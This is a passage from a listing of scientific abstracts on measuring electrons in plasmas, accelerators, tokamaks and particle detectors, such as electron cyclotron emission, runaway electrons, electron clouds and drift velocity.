electron flux has to be calculated for each iteration. A conventional Monte-Carlo method used earlier for evaluation of supra-thermal electron fluxes is rather slow for performing the iterations in reasonable computer time. In the present report, the Stochastic Mapping Technique (SMT), which is more effective than the conventional Monte Carlo method, is used instead. Here, the problem with a local monoenergetic supra-thermal particle source is considered and the effect of supra-thermal electron fluxes on both, the self-consistent radial electric field and the formation of different roots of the ambipolarity condition are studied 12. Effect of Electron Seeding on Experimentally Measured Multipactor Discharge Threshold Science.gov (United States) Noland, Jonathan; Graves, Timothy; Lemon, Colby; Looper, Mark; Farkas, Alex 2012-10-01 Multipactor is a vacuum phenomenon in which electrons, moving in resonance with an externally applied electric field, impact material surfaces. If the number of secondary electrons created per primary electron impact averages more than unity, the resonant interaction can lead to an electron avalanche. Multipactor is a generally undesirable phenomenon, as it can cause local heating, absorb power, or cause detuning of RF circuits. In order to increase the probability of multipactor initiation, test facilities often employ various seeding sources such as radioactive sources (Cesium 137, Strontium 90), electron guns, or photon sources. Even with these sources, the voltage for multipactor initiation is not certain as parameters such as material type, RF pulse length, and device wall thickness can all affect seed electron flux and energy in critical gap regions, and hence the measured voltage threshold. This study investigates the effects of seed electron source type (e.g., photons versus beta particles), material type, gap size, and RF pulse length variation on multipactor threshold. In addition to the experimental work, GEANT4 simulations will be used to estimate the production rate of low energy electrons (< 5 keV) by high energy electrons and photons. A comparison of the experimental fluxes to the typical energetic photon and particle fluxes experienced by spacecraft in various orbits will also be made. Initial results indicate that for a simple, parallel plate device made of aluminum, there is no threshold variation (with seed electrons versus with no seed electrons) under continuous-wave RF exposure. 13. Measurements on wave propagation characteristics of spiraling electron beams Science.gov (United States) Singh, A.; Getty, W. D. 1976-01-01 Dispersion characteristics of cyclotron-harmonic waves propagating on a neutralized spiraling electron beam immersed in a uniform axial magnetic field are studied experimentally. The experimental setup consisted of a vacuum system, an electron-gun corkscrew assembly which produces a 110-eV beam with the desired delta-function velocity distribution, a measurement region where a microwave signal is injected onto the beam to measure wavelengths, and a velocity analyzer for measuring the axial electron velocity. Results of wavelength measurements made at beam currents of 0.15, 1.0, and 2.0 mA are compared with calculated values, and undesirable effects produced by increasing the beam current are discussed. It is concluded that a suitable electron beam for studies of cyclotron-harmonic waves can be generated by the corkscrew device. 14. Several cases of electronics and the measuring methods International Nuclear Information System (INIS) Supardiyono, Bb.; Kamadi, J.; Suparmono, M.; Indarto. 1980-01-01 Several cases of electronics and the measuring methods, covering electric conductivity and electric potential of analog systems, electric current, electric conductivity and electric potential of semiconductor diodes, and characteristics of transistors are described. (SMN) 15. Profile measurements of localized fast electrons and ions in TORE SUPRA International Nuclear Information System (INIS) Basiuk, V.; Roubin, J.P.; Becoulet, A.; Carrasco, J.; Martin, G.; Moreau, D.; Saoutic, B. 1992-01-01 The strong toroidal and poloidal anisotropy of the heat flux to the first wall of Tore Supra during additional heating has been related to suprathermal particle losses induced by the TF ripple. In this paper we describe a new system of electric collectors designed to diagnose these localized particles and we analyse measurements performed during LHCD, ICRH and NBI heating. The interaction of fast particles created by additional heating with the TF ripple perturbation in Tore Supra has been analyzed by a direct measurement of the localized particles. The good confinement region has been identified thanks to a peak in the measured current profiles and is in agreement with theory. During LHCD and ICRH, the global losses are weak but strongly anisotropic leading to hot spots at the wall. During ICRH, an ejection of fast ions by the sawteeth towards peripheral zones where they get lost in the ripple has been seen. This is a possible scenario of α particle losses in a reactor 16. Surface characterization by energy distribution measurements of secondary electrons and of ion-induced electrons International Nuclear Information System (INIS) Bauer, H.E.; Seiler, H. 1988-01-01 Instruments for surface microanalysis (e.g. scanning electron or ion microprobes, emission electron or ion microscopes) use the current of emitted secondary electrons or of emitted ion-induced electrons for imaging of the analysed surface. These currents, integrating over all energies of the emitted low energy electrons, are however, not well suited to surface analytical purposes. On the contrary, the energy distribution of these electrons is extremely surface-sensitive with respect to shape, size, width, most probable energy, and cut-off energy. The energy distribution measurements were performed with a cylindrical mirror analyser and converted into N(E), if necessary. Presented are energy spectra of electrons released by electrons and argon ions of some contaminated and sputter cleaned metals, the change of the secondary electron energy distribution from oxidized aluminium to clean aluminium, and the change of the cut-off energy due to work function change of oxidized aluminium, and of a silver layer on a platinum sample. The energy distribution of the secondary electrons often shows detailed structures, probably due to low-energy Auger electrons, and is broader than the energy distribution of ion-induced electrons of the same object point. (author) 17. Measurements of the Electron Reconstruction and Identification Efficiencies in ATLAS CERN Document Server Sommer, P; The ATLAS collaboration 2014-01-01 Isolated, high-energy electrons constitute a very clean signature at hadron collider experiments. As the final states of many Standard Model processes, as well as physics beyond the Standard Model, analyses at the ATLAS experiment heavily rely on electrons. A precise knowledge of the efficiency to correctly reconstruct and identify these electrons is thus important. In this contribution the measurement of these efficiencies is described. It is performed with a tag-and-probe method using $Z$ and $J/\\psi$ decays to electrons in $20.3\\,\\mathrm{fb}^{-1}$ of $pp$ collisions recorded in 2012 at $\\sqrt{s}=8$ TeV. The combination of the measurements results in identification efficiencies determined with an accuracy of a few per mil for electrons with a transverse energy of $E_{\\mathrm{T}}>30$ GeV. 18. Measurement of Cosmic-Ray TeV Electrons Science.gov (United States) Schubnell, Michael; Anderson, T.; Bower, C.; Coutu, S.; Gennaro, J.; Geske, M.; Mueller, D.; Musser, J.; Nutter, S.; Park, N.; Tarle, G.; Wakely, S. 2011-09-01 The Cosmic Ray Electron Synchrotron Telescope (CREST) high-altitude balloon experiment is a pathfinding effort to detect for the first time multi-TeV cosmic-ray electrons. At these energies distant sources will not contribute to the local electron spectrum due to the strong energy losses of the electrons and thus TeV observations will reflect the distribution and abundance of nearby acceleration sites. CREST will detect electrons indirectly by measuring the characteristic synchrotron photons generated in the Earth's magnetic field. The instrument consist of an array of 1024 BaF2 crystals viewed by photomultiplier tubes surrounded by a hermetic scintillator shield. Since the primary electron itself need not traverse the payload, an effective detection area is achieved that is several times the nominal 6.4 m2 instrument. CREST is scheduled to fly in a long duration circumpolar orbit over Antarctica during the 2011-12 season. 19. Measurement of the electron beam mode in earth's foreshock Science.gov (United States) Onsager, T. G.; Holzworth, R. H. 1990-01-01 High frequency electric field measurements from the AMPTE IRM plasma wave receiver are used to identify three simultaneously excited electrostatic wave modes in the earth's foreshock region: the electron beam mode, the Langmuir mode, and the ion acoustic mode. A technique is developed which allows the rest frame frequecy and wave number of the electron beam waves to be determined. It is shown that the experimentally determined rest frame frequency and wave number agree well with the most unstable frequency and wave number predicted by linear homogeneous Vlasov theory for a plasma with Maxwellian background electrons and a Lorentzian electron beam. From a comparison of the experimentally determined and theoretical values, approximate limits are put on the electron foreshock beam temperatures. A possible generation mechanism for ion acoustic waves involving mode coupling between the electron beam and Langmuir modes is also discussed. 20. MICROWAVE NOISE MEASUREMENT OF ELECTRON TEMPERATURES IN AFTERGLOW PLASMAS Energy Technology Data Exchange (ETDEWEB) Leiby, Jr., C. C.; McBee, W. D. 1963-10-15 Transient electron temperatures in afterglow plasmas were determined for He (5 and 10 torr), Ne, and Ne plus or minus 5% Ar (2.4 and 24 torr) by combining measurements of plasma microwave noise power, and plasma reflectivity and absorptivity. Use of a low-noise parametric preamplifier permitted continuous detection during the afterglow of noise power at 5.5 Bc in a 1 Mc bandwidth. Electron temperature decays were a function of pressure and gas but were slower than predicted by electron energy loss mechanisms. The addition of argon altered the electron density decay in the neon afterglow but the electron temperature decay was not appreciably changed. Resonances in detected noise power vs time in the afterglow were observed for two of the three plasma waveguide geometries studied. These resonances correlate with observed resonances in absorptivity and occur over the same range of electron densities for a given geometry independent of gas type and pressure. (auth) 1. Electron attachment rate constant measurement by photoemission electron attachment ion mobility spectrometry (PE-EA-IMS) International Nuclear Information System (INIS) Su, Desheng; Niu, Wenqi; Liu, Sheng; Shen, Chengyin; Huang, Chaoqun; Wang, Hongmei; Jiang, Haihe; Chu, Yannan 2012-01-01 Photoemission electron attachment ion mobility spectrometry (PE-EA-IMS), with a source of photoelectrons induced by vacuum ultraviolet radiation on a metal surface, has been developed to study electron attachment reaction at atmospheric pressure using nitrogen as the buffer gas. Based on the negative ion mobility spectra, the rate constants for electron attachment to tetrachloromethane and chloroform were measured at ambient temperature as a function of the average electron energy in the range from 0.29 to 0.96 eV. The experimental results are in good agreement with the data reported in the literature. - Highlights: ► Photoemission electron attachment ion mobility spectrometry (PE-EA-IMS) was developed to study electron attachment reaction. ► The rate constants of electron attachment to CCl 4 and CHCl 3 were determined. ► The present experimental results are in good agreement with the previously reported data. 2. Measurement of Electron Clouds in Large Accelerators by Microwave Dispersion Energy Technology Data Exchange (ETDEWEB) De Santis, S.; Byrd, J.M.; /LBL, Berkeley; Caspers, F.; /CERN; Krasnykh, A.; /SLAC; Kroyer, T.; /CERN; Pivi, M.T.F.; /SLAC; Sonnad, K.G.; /LBL, Berkeley 2008-03-19 Clouds of low energy electrons in the vacuum beam pipes of accelerators of positively charged particle beams present a serious limitation for operation at high currents. Furthermore, it is difficult to probe their density over substantial lengths of the beam pipe. We have developed a novel technique to directly measure the electron cloud density via the phase shift induced in a TE wave transmitted over a section of the accelerator and used it to measure the average electron cloud density over a 50 m section in the positron ring of the PEP-II collider at the Stanford Linear Accelerator Center. 3. Radially localized measurements of superthermal electrons using oblique electron cyclotron emission International Nuclear Information System (INIS) Preische, S.; Efthimion, P.C.; Kaye, S.M. 1996-05-01 It is shown that radial localization of optically tin Electron Cyclotron Emission from superthermal electrons can be imposed by observation of emission upshifted from the thermal cyclotron resonance in the horizontal midplane of a tokamak. A new and unique diagnostic has been proposed and operated to make radially localized measurements of superthermal electrons during Lower Hybrid Current Drive on the PBX-M tokamak. The superthermal electron density profile as well as moments of the electron energy distribution as a function of radius are measured during Lower Hybrid Current Drive. The time evolution of these measurements after the Lower Hybrid power is turned off are given and the observed behavior reflects the collisional isotropization of the energy distribution and radial diffusion of the spatial profile 4. Electron cyclotron emission measurements on JET: Michelson interferometer, new absolute calibration, and determination of electron temperature NARCIS (Netherlands) Schmuck, S.; Fessey, J.; Gerbaud, T.; Alper, B.; Beurskens, M. N. A.; de la Luna, E.; Sirinelli, A.; Zerbini, M. 2012-01-01 At the fusion experiment JET, a Michelson interferometer is used to measure the spectrum of the electron cyclotron emission in the spectral range 70-500 GHz. The interferometer is absolutely calibrated using the hot/cold technique and, in consequence, the spatial profile of the plasma electron 5. Electron cyclotron emission measurements at the stellarator TJ-K Energy Technology Data Exchange (ETDEWEB) Sichardt, Gabriel; Ramisch, Mirko [Institut fuer Grenzflaechenverfahrenstechnik und Plasmatechnologie, Universitaet Stuttgart (Germany); Koehn, Alf [Max-Planck-Institut fuer Plasmaphysik, Garching (Germany) 2016-07-01 Electron temperature (T{sub e}) measurements in the magnetised plasmas of the stellarator TJ-K are currently performed by means of Langmuir probes. The use of these probes is restricted to relatively low temperatures and the measurement of temperature profiles requires the acquisition of the local current-voltage characteristics which limits strongly the sampling rate. As an alternative, T{sub e} can be measured using the electron cyclotron emission (ECE) that is generated by the gyration of electrons in magnetised plasmas. Magnetic field gradients in the plasma lead to a spatial distribution of emission frequencies and thus the measured intensity at a given frequency can be related to its point of origin. The T{sub e} dependence of the intensity then leads to a temperature profile along the line of sight for Maxwellian velocity distributions. A diagnostic system for T{sub e} measurements using ECE is currently being set up at TJ-K. When non-thermal electrons are present the emission spectrum changes dramatically. Therefore, the ECE can also be used to investigate the contribution of fast electrons to previously observed toroidal net currents in TJ-K. Simulations are used to examine the role of electron drift orbits in generating these currents. 6. Measurement of the electron beam mode in the Earth's foreshock International Nuclear Information System (INIS) Onsager, T.G.; Holzworth, R.H. 1990-01-01 High frequency electric field measurements from the AMPTE IRM plasma wave receiver are used to identify three simultaneously excited electrostatic wave modes in the Earth's foreshock region: the electron beam mode the Langmuir mode, and the ion acoustic mode. A technique is developed which allows the rest frame frequency and wave number of the electron beam waves to be determined. Plasma wave and magnetometer data are used to determine the interplanetary magnetic field direction at which the spacecraft becomes magnetically connected to the Earth's bow shock. From the knowledge of this direction, the upstreaming electron cutoff velocity can be calculated. The authors take this calculated cutoff velocity to be the flow velocity of an electron beam in the plasma. Assuming that the wave phase speed is approximately equal to the beam speed and using the measured electric field frequency, they determine the plasma rest frame frequency and the wave number. They then show that the experimentally determined rest frame frequency and wave number agree well with the most unstable frequency and wave number predicted by linear homogeneous Vlasov theory for a plasma with Maxwellian background electrons and a Lorentzian electron beam. From a comparison of the experimentally determined and theoretical values, approximate limits are put on the electron foreshock beam temperatures. A possible generation mechanism for ion acoustic waves involving mode coupling between the electron beam and Langmuir modes is also discussed 7. Measurements of the electron cloud in the APS storage ring International Nuclear Information System (INIS) Harkey, K. C. 1999-01-01 Synchrotron radiation interacting with the vacuum chamber walls in a storage ring produce photoelectrons that can be accelerated by the beam, acquiring sufficient energy to produce secondary electrons in collisions with the walls. If the secondary-electron yield (SEY) coefficient of the wall material is greater than one, as is the case with the aluminum chambers in the Advanced Photon Source (APS) storage ring, a runaway condition can develop. As the electron cloud builds up along a train of stored positron or electron bunches, the possibility exists that a transverse perturbation of the head bunch will be communicated to trailing bunches due to interaction with the cloud. In order to characterize the electron cloud, a special vacuum chamber was built and inserted into the ring. The chamber contains 10 rudimentary electron-energy analyzers, as well as three targets coated with different materials. Measurements show that the intensity and electron energy distribution are highly dependent on the temporal spacing between adjacent bunches and the amount of current contained in each bunch. Furthermore, measurements using the different targets are consistent with what would be expected based on the SEY of the coatings. Data for both positron and electron beams are presented 8. Secondary electrons monitor for continuous electron energy measurements in UHF linac International Nuclear Information System (INIS) Zimek, Zbigniew; Bulka, Sylwester; Mirkowski, Jacek; Roman, Karol 2001-01-01 Continuous energy measurements have now became obligatory in accelerator facilities devoted to radiation sterilization process. This is one of several accelerator parameters like dose rate, beam current, bean scan parameters, conveyer speed which must be recorded as it is a required condition of accelerator validation procedure. Electron energy measurements are rather simple in direct DC accelerator, where the applied DC voltage is directly related to electron energy. High frequency linacs are not offering such opportunity in electron energy measurements. The analyzing electromagnet is applied in some accelerators but that method can be used only in off line mode before or after irradiation process. The typical solution is to apply the non direct method related to control and measurements certain accelerator parameters like beam current and microwave energy pulse power. The continuous evaluation of electron energy can be performed on the base of calculation and result comparison with calibration curve 9. Measuring the electron beam energy in a magnetic bunch compressor Energy Technology Data Exchange (ETDEWEB) Hacker, Kirsten 2010-09-15 Within this thesis, work was carried out in and around the first bunch compressor chicane of the FLASH (Free-electron LASer in Hamburg) linear accelerator in which two distinct systems were developed for the measurement of an electron beams' position with sub-5 {mu}m precision over a 10 cm range. One of these two systems utilized RF techniques to measure the difference between the arrival-times of two broadband electrical pulses generated by the passage of the electron beam adjacent to a pickup antenna. The other system measured the arrival-times of the pulses from the pickup with an optical technique dependent on the delivery of laser pulses which are synchronized to the RF reference of the machine. The relative advantages and disadvantages of these two techniques are explored and compared to other available approaches to measure the same beam property, including a time-of-flight measurement with two beam arrival-time monitors and a synchrotron light monitor with two photomultiplier tubes. The electron beam position measurement is required as part of a measurement of the electron beam energy and could be used in an intra-bunch-train beam-based feedback system that would stabilize the amplitude of the accelerating field. By stabilizing the accelerating field amplitude, the arrival-time of the electron beam can be made more stable. By stabilizing the electron beam arrival-time relative to a stable reference, diagnostic, seeding, and beam-manipulation lasers can be synchronized to the beam. (orig.) 10. Beam lifetime measurement and analysis in Indus-2 electron ... Indian Academy of Sciences (India) In this paper, the beam lifetime measurement and its theoretical analysis are presented using measured vacuum pressure and applied radio frequency (RF) cavity voltage in Indus-2 electron storage ring at 2 GeV beam energy. Experimental studies of the effect of RF cavity voltage and bunched beam filling pattern on beam ... 11. Electron density measurements in the TRIAM-1 tokamak Energy Technology Data Exchange (ETDEWEB) Mitarai, O; Nakashima, H; Nakamura, K; Hiraki, N; Toi, K [Kyushu Univ., Fukuoka (Japan). Research Inst. for Applied Mechanics 1980-02-01 Electron density measurements in the TRIAM-1 tokamak are carried out by a 140 GHz microwave interferometer. To follow rapid density variations, a high-speed direct-reading type interferometer is constructed. The density of (1 - 20) x 10/sup 13/ cm/sup -3/ is measured. 12. Electron density measurements in the TRIAM-1 tokamak International Nuclear Information System (INIS) Mitarai, Osamu; Nakashima, Hisatoshi; Nakamura, Kazuo; Hiraki, Naoji; Toi, Kazuo 1980-01-01 Electron density measurements in the TRIAM-1 tokamak are carried out by a 140 GHz microwave interferometer. To follow rapid density variations, a high-speed direct-reading type interferometer is constructed. The density of (1 - 20) x 10 13 cm -3 is measured. (author) 13. Rocket measurements of electron density irregularities during MAC/SINE Science.gov (United States) Ulwick, J. C. 1989-01-01 Four Super Arcas rockets were launched at the Andoya Rocket Range, Norway, as part of the MAC/SINE campaign to measure electron density irregularities with high spatial resolution in the cold summer polar mesosphere. They were launched as part of two salvos: the turbulent/gravity wave salvo (3 rockets) and the EISCAT/SOUSY radar salvo (one rocket). In both salvos meteorological rockets, measuring temperature and winds, were also launched and the SOUSY radar, located near the launch site, measured mesospheric turbulence. Electron density irregularities and strong gradients were measured by the rocket probes in the region of most intense backscatter observed by the radar. The electron density profiles (8 to 4 on ascent and 4 on descent) show very different characteristics in the peak scattering region and show marked spatial and temporal variability. These data are intercompared and discussed. 14. Effects of lower hybrid fast electron populations on electron temperature measurements at JET International Nuclear Information System (INIS) Tanzi, C.P.; Bartlett, D.V.; Schunke, B. 1993-01-01 The Lower Hybrid Current Drive (LHCD) system on JET has to date achieved up to 1.5 MA of driven current. This current is carried by a fast electron population with energies more than ten times the electron temperature and density about 10 -4 of the bulk plasma. This paper discusses the effects of this fast electron population on our ability to make reliable temperature measurements using ECE and reviews the effects on other plasma diagnostics which rely on ECE temperature measurements for their interpretation. (orig.) 15. Electron Source Brightness and Illumination Semi-Angle Distribution Measurement in a Transmission Electron Microscope. Science.gov (United States) Börrnert, Felix; Renner, Julian; Kaiser, Ute 2018-05-21 The electron source brightness is an important parameter in an electron microscope. Reliable and easy brightness measurement routes are not easily found. A determination method for the illumination semi-angle distribution in transmission electron microscopy is even less well documented. Herein, we report a simple measurement route for both entities and demonstrate it on a state-of-the-art instrument. The reduced axial brightness of the FEI X-FEG with a monochromator was determined to be larger than 108 A/(m2 sr V). 16. Electron Identification Performance and First Measurement of $W \\to e + \ CERN Document Server Ueno, Rynichi 2010-01-01 The identification of electrons is important for the ATLAS experiment because electrons are present in many interactions of interest produced at the Large Hadron Collider. A deep knowledge of the detector, the electron identification algorithms, and the calibration techniques are crucial in order to accomplish this task. This thesis work presents a Monte Carlo study using electrons from the W —> e + v process to evaluate the performance of the ATLAS electromagnetic calorimeter. A significant number of electrons was produced in the early ATLAS collision runs at centre-of-mass energies of 900 GeV and 7 TeV between November 2009 and April 2010, and their properties are presented. Finally, a first measurement of W —> e + v process with the ATLAS experiment was successfully accomplished with the first C = 1.0 nb_ 1 of data at the 7 TeV collision energy, and the properties of the W candidates are also detailed. 17. An optimized Faraday cage design for electron beam current measurements International Nuclear Information System (INIS) Turner, J.N.; Hausner, G.G.; Parsons, D.F. 1975-01-01 A Faraday cage detector is described for measuring electron beam intensity for use with energies up to 1.2 Mev, with the present data taken at 100 keV. The design features a readily changeable limiting aperture and detector cup geometry, and a secondary electron suppression grid. The detection efficiency of the cage is shown to be limited only by primary backscatter through the detector solid angle of escape, which is optimized with respect to primary backscattered electrons and secondary electron escape. The geometry and stopping material of the detection cup are varied, and the results show that for maximum detection efficiency with carbon as the stopping mateiral, the solid angle of escape must be equal to or less than 0.05πsr. The experimental results are consistent within the +-2% accuracy of the detection electronics, and are not limited by the Faraday cage detection efficiency. (author) 18. Measurements and simulations of seeded electron microbunches with collective effects Directory of Open Access Journals (Sweden) K. Hacker 2015-09-01 Full Text Available Measurements of the longitudinal phase-space distributions of electron bunches seeded with an external laser were done in order to study the impact of collective effects on seeded microbunches in free-electron lasers. When the collective effects of Coulomb forces in a drift space and coherent synchrotron radiation in a chicane are considered, velocity bunching of a seeded microbunch appears to be a viable alternative to compression with a magnetic chicane under high-gain harmonic generation seeding conditions. Measurements of these effects on seeded electron microbunches were performed with a rf deflecting structure and a dipole magnet which streak out the electron bunch for single-shot images of the longitudinal phase-space distribution. Particle tracking simulations in 3D predicted the compression dynamics of the seeded microbunches with collective effects. 19. Measurements of electron drift velocity in pure isobutane Energy Technology Data Exchange (ETDEWEB) Vivaldini, Tulio C.; Lima, Iara B.; Goncalves, Josemary A.C.; Botelho, Suzana; Tobias, Carmen C.B., E-mail: [email protected] [Instituto de Pesquisas Energeticas e Nucleares (IPEN/CNEN-SP), Sao Paulo, SP (Brazil); Ridenti, Marco A.; Pascholati, Paulo R. [Universidade de Sao Paulo (USP), SP (Brazil). Inst. de Fisica. Lab. do Acelerador Linear; Fonte, Paulo; Mangiarotti, Alessio [Universidade de Coimbra (Portugal). Dept de Fisica. Lab. de Instrumentacao e Fisica Experimental de Particulas 2009-07-01 In this work we report on preliminary results related to the dependence of the electron drift velocity for pure isobutane as a function of reduced electric field (E/N) in the range from 100 Td up to 216 Td. The measurements of electron drift velocity were based on the Pulsed Townsend technique. In order to validate the technique and analyzing non-uniformity effects, results for nitrogen are also presented and compared with a numerical simulation of the Bolsig+ code. (author) 20. Measurements of electron drift velocity in pure isobutane International Nuclear Information System (INIS) Vivaldini, Tulio C.; Lima, Iara B.; Goncalves, Josemary A.C.; Botelho, Suzana; Tobias, Carmen C.B.; Ridenti, Marco A.; Pascholati, Paulo R.; Fonte, Paulo; Mangiarotti, Alessio 2009-01-01 In this work we report on preliminary results related to the dependence of the electron drift velocity for pure isobutane as a function of reduced electric field (E/N) in the range from 100 Td up to 216 Td. The measurements of electron drift velocity were based on the Pulsed Townsend technique. In order to validate the technique and analyzing non-uniformity effects, results for nitrogen are also presented and compared with a numerical simulation of the Bolsig+ code. (author) 1. Measurement of electron beam polarization at the SLC International Nuclear Information System (INIS) Steiner, H.; California Univ., Berkeley 1988-01-01 One of the unique features of the SLC is its capability to accelerate longitudinally polarized electrons. The SLC polarization group has been performed to implement the polarization program at the SLC. Technically the polarization project consists of three main parts: (1) a polarized source, (2) spin-rotating superconducting solenoid magnets to be used to manipulate the direction of the electron spin, and (3) the polarimeters needed to monitor and measure the electron beam polarization. It is this last topic that will concern us here. Two types of polarimeters will be used - Compton and Moeller. (orig./HSI) 2. Chloride ingress profiles measured by electron probe micro analysis DEFF Research Database (Denmark) Jensen, Ole mejlhede; Coats, Alison M.; Glasser, Fred P. 1996-01-01 Traditional techniques for measuring chloride ingress profiles do not apply well to high performance cement paste systems; the geometric resolution of the traditional measuring techniques is too low. In this paper measurements by Electron Probe Micro Analysis (EPMA) are presented. EPMA is demonst......Traditional techniques for measuring chloride ingress profiles do not apply well to high performance cement paste systems; the geometric resolution of the traditional measuring techniques is too low. In this paper measurements by Electron Probe Micro Analysis (EPMA) are presented. EPMA...... is demonstated to determine chloride ingress in cement paste on a micrometer scale. Potential chloride ingress routes such as cracks or the paste-aggregate interface may also be characterized by EPMA. Copyright (C) 1996 Elsevier Science Ltd... 3. Electron Beam Size Measurements in a Cooling Solenoid CERN Document Server Kroc, Thomas K; Burov, Alexey; Seletsky, Sergey; Shemyakin, Alexander V 2005-01-01 The Fermilab Electron Cooling Project requires a straight trajectory and constant beam size to provide effective cooling of the antiprotons in the Recycler. A measurement system was developed using movable appertures and steering bumps to measure the beam size in a 20 m long, nearly continuous, solenoid. This paper discusses the required beam parameters, the implimentation of the measurement system and results for our application. 4. Local texture measurements with the scanning electron microscope International Nuclear Information System (INIS) Gottstein, G.; Engler, O. 1993-01-01 Techniques for convenient measurement of the crystallographic orientation of small volumes in bulk samples by electron diffraction in the SEM are discussed. They make use of Selected Area Electron Channelling Patterns (SAECP) and Electron Back Scattering Patterns (EBSP). The principle of pattern formation as well as measuring and evaluation procedure are introduced. The methods offer a viable procedure for obtaining information on the spatial arrangement of orientations, i.e. on orientation topography. Thus, they provide a new level of information on crystallographic texture. An application of the techniques for local texture measurements is demonstrated by an example, namely for investigation of considering the recrystallization behaviour of binary Al-1.3% Mn with large precipitates. Finally, further developments of the EBSP technique are addressed. (orig.) 5. Measurement of microwave radiation from electron beam in the atmosphere Energy Technology Data Exchange (ETDEWEB) Ohta, I.S.; Akimune, H. [Faculty of Science and Engineering, Konan University, Kobe 658-8501 (Japan); Fukushima, M.; Ikeda, D. [Institute of Cosmic Ray Research, University of Tokyo, Kashiwa, Chiba 277-8582 (Japan); Inome, Y. [Faculty of Science and Engineering, Konan University, Kobe 658-8501 (Japan); Matthews, J.N. [University of Utah, Salt Lake City, UT 4112-0830 (United States); Ogio, S. [Graduate School of Science, Osaka City University, Osaka 558-8585 (Japan); Sagawa, H. [Institute of Cosmic Ray Research, University of Tokyo, Kashiwa, Chiba 277-8582 (Japan); Sako, T. [Solar-Terrestrial Environment Laboratory, Nagoya University, Nagoya 464-8601 (Japan); Shibata, T. [High Energy Accelerator Research Organization (KEK), Tsukuba 305-0801 (Japan); Yamamoto, T., E-mail: [email protected] [Faculty of Science and Engineering, Konan University, Kobe 658-8501 (Japan) 2016-02-21 We report the use of an electron light source (ELS) located at the Telescope Array Observatory in Utah, USA, to measure the isotropic microwave radiation from air showers. To simulate extensive air showers, the ELS emits an electron beam into the atmosphere and a parabola antenna system for the satellite communication is used to measure the microwave radiation from the electron beam. Based on this measurement, an upper limit on the intensity of a 12.5 GHz microwave radiation at 0.5 m from a 10{sup 18} eV air shower was estimated to be 3.96×10{sup −16} W m{sup −2} Hz{sup −1} with a 95% confidence level. 6. Electron temperature measurements in lowdensity plasmas by helium spectroscopy International Nuclear Information System (INIS) Brenning, N. 1977-09-01 This method to use relative intensities of singlet and triplet lines of neutral helium to measure electron temperature in low-density plasmas is examined. Calculations from measured and theoretical data about transitions in neutral helium are carried out and compared to experimental results. It is found that relative intensities of singlet and triplet lines from neutral helium only can be used for TE determination in low-density, short-duration plasmas. The most important limiting processes are excitation from the metastable 2 3 S level and excitation transfer in collisions between electrons and excited helium atoms. An evaluation method is suggested, which minimizes the effect of these processes. (author) 7. Study of ion cyclotron fluctuations. Application to the measurement of the ion temperature International Nuclear Information System (INIS) Lehner, T. 1982-02-01 A diagnostic technique for measuring the ion temperature of tokamak-type plasmas was developed. A theoretical study was made of the form factor associated with the ion cyclotron waves; the influence of Te/Ti on the frequency of the extrema of the dispersion relations was demonstrated. The different effects able to modify the spectral density (in particular the drift velocity and the impurities) were investigated. The mechanisms of suprathermal excitation of cylotron waves in tokamaks were reviewed together with the various effects stabilizing the spectrum: collisions, shear of the magnetic field lines. The experimental realization of the diagnostic technique is based on Thomson scattering by the electron density fluctuations [fr 8. Tests of an electron monitor for routine quality control measurements of electron energies International Nuclear Information System (INIS) Ramsay, E.B.; Reinstein, L.E.; Meek, A.G. 1991-01-01 The depth dose for electrons is sensitive to energy and the AAPM Task Group 24 has recommended that tests be performed at monthly intervals to assure electron beam energy constancy by verifying the depth for the 80% dose to within ±3 mm. Typically, this is accomplished by using a two-depth dose ratio technique. Recently, a new device, the Geske monitor, has been introduced that is designed for verifying energy constancy in a single reading. The monitor consists of nine parallel plate detectors that alternate with 5-mm-thick absorbers made of an aluminum alloy. An evaluation of the clinical usefulness of this monitor for the electron beams available on a Varian Clinac 20 has been undertaken with respect to energy discrimination. Beam energy changes of 3 mm of the 80% dose give rise to measurable output changes ranging from 1.7% for 20-MeV electron beams to 15% for 6-MeV electron beams 9. Slowly moving test charge in two-electron component non-Maxwellian plasma International Nuclear Information System (INIS) Ali, S.; Eliasson, B. 2015-01-01 Potential distributions around a slowly moving test charge are calculated by taking into account the electron-acoustic waves in an unmagnetized plasma. Considering a neutralizing background of static positive ions, the supra-thermal hot and cold electrons are described by the Vlasov equations to account for the Kappa (power-law in velocity space) and Maxwell equilibrium distributions. Fourier analysis further leads to the derivation of electrostatic potential showing the impact of supra-thermal hot electrons. The test charge moves slowly in comparison with the hot and cold electron thermal speeds and is therefore shielded by the electrons. This gives rise to a short-range Debye-Hückel potential decaying exponentially with distance and to a far field potential decaying as inverse third power of the distance from the test charge. The results are relevant for both laboratory and space plasmas, where supra-thermal hot electrons with power-law distributions have been observed 10. Spectral measurements of runway electrons in the TEXTOR tokamak International Nuclear Information System (INIS) Kudyakov, Timur 2009-01-01 The generation of multi-MeV runaway electrons is a well known effect related to the plasma disruptions in tokamaks. The runaway electrons can substantially reduce the lifetime of the future tokamak ITER. In this thesis physical properties of runaway electrons and their possible negative effects on ITER have been studied in the TEXTOR tokamak. A new diagnostic, a scanning probe, has been developed to provide direct measurements of the absolute number of runaway electrons coming from the plasma, its energy distribution and the related energy load in the material during low density (runaway) discharges and during disruptions. The basic elements of the probe are YSO crystals which transform the energy of runaway electrons into visible light which is guided via optical fibres to photomultipliers. In order to obtain the energy distribution of runaways, the crystals are covered with layers of stainless steel (or tungsten in two earlier test versions) of different thicknesses. The final probe design has 9 crystals and can temporally and spectrally resolve electrons with energies between 4 MeV and 30 MeV. The probe is tested and absolutely calibrated at the linear electron accelerator ELBE in Rossendorf. The measurements are in good agreement with Monte Carlo simulations using the Geant4 code. The runaway transport in the presence of the internal and externally applied magnetic perturbations has been studied. The diffusion coefficient and the value of the magnetic fluctuation for runaways were derived as a function of B t . It was found that an increase of runaway losses from the plasma with the decreasing toroidal magnetic field is accompanied with a growth of the magnetic fluctuation in the plasma. The magnetic shielding picture could be confirmed which predicts that the runaway loss occurs predominantly for low energy runaways (few MeV) and considerably less for the high energy ones. In the case of the externally applied magnetic perturbations by means of the dynamic 11. Spectral measurements of runway electrons in the TEXTOR tokamak Energy Technology Data Exchange (ETDEWEB) Kudyakov, Timur 2009-07-22 The generation of multi-MeV runaway electrons is a well known effect related to the plasma disruptions in tokamaks. The runaway electrons can substantially reduce the lifetime of the future tokamak ITER. In this thesis physical properties of runaway electrons and their possible negative effects on ITER have been studied in the TEXTOR tokamak. A new diagnostic, a scanning probe, has been developed to provide direct measurements of the absolute number of runaway electrons coming from the plasma, its energy distribution and the related energy load in the material during low density 